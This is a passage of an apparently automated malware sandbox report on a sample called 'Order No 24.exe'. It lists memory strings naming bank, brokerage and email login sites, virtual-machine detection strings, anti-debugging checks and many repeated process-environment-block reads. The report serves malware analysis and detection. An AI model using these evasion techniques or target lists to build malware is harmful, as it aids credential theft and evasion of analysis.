                Source: F14431U2a.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: firefox.exe, 0000000A.00000002.2605771952.000001666CB5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: F14431U2a.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696)
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: F14431U2a.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: F14431U2a.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: F14431U2a.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: F14431U2a.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saction PasswordVMware20,11696487552^
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,116]
                Source: F14431U2a.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: F14431U2a.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: F14431U2a.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: look.office.comVMware20,11696487552s
                Source: F14431U2a.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A8F53 rdtsc 2_2_004A8F53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004A7B93 LdrLoadDll,2_2_004A7B93
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D6AAF BlockInput,0_2_009D6AAF
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983D19
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_009B3920
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099E01E LoadLibraryA,GetProcAddress,0_2_0099E01E
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_01273780 mov eax, dword ptr fs:[00000030h]0_2_01273780
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_01274E00 mov eax, dword ptr fs:[00000030h]0_2_01274E00
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_01274E60 mov eax, dword ptr fs:[00000030h]0_2_01274E60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
